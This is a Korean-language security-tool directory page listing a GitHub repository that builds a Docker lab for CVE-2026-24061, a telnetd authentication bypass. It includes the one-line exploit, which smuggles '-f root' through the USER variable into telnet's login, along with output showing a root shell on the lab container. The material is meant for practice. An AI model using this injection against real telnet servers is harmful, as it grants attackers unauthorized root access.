Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-24061-setup — CVE-2026-24061용 Docker 설정 | Kitploit
도구/GitHubGitHub/shivam-bathla/cve-2026-24061-setup
Authentication & AuthorizationPrivilege EscalationVulnerability AnalysisExploitationLabs & Practice
GitHubshivam-bathla/cve-2026-24061-setup

CVE-2026-24061-setup

CVE-2026-24061용 Docker 설정

저장소 보기
41457개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-24061 설정

이 저장소에는 CVE-2026-24061용 Docker 설정이 포함되어 있습니다.

Docker를 설치했다면 다음을 수행하세요:

  1. 이 저장소를 클론하세요.

  2. 다음 명령어를 실행하세요:

root@kitploit:~
sudo docker build . --tag telnetd-auth-bypass
  1. Docker 이미지가 빌드되면 다음 명령어로 컨테이너를 시작할 수 있습니다:
root@kitploit:~
sudo docker run -dt --rm --name test telnetd-auth-bypass
  1. 완료되면 해킹할 준비가 된 취약한 실습 환경이 준비됩니다. 페이로드를 보내고 루트 셸을 획득하세요 :)
root@kitploit:~
kali@kali:~$ USER="-f root" telnet -a 172.17.0.2
Trying 172.17.0.2...
Connected to 172.17.0.2.
Escape character is '^]'.

Linux 6.12.25-amd64 (5321b63dbc56) (pts/1)

Welcome to Ubuntu 24.04.3 LTS (GNU/Linux 6.12.25-amd64 x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

root@5321b63dbc56:~# 

자세한 내용은 Telnet 인증 우회를 통한 루트 권한 취약점에 대한 제 게시물을 참조하세요.

도구 다운로드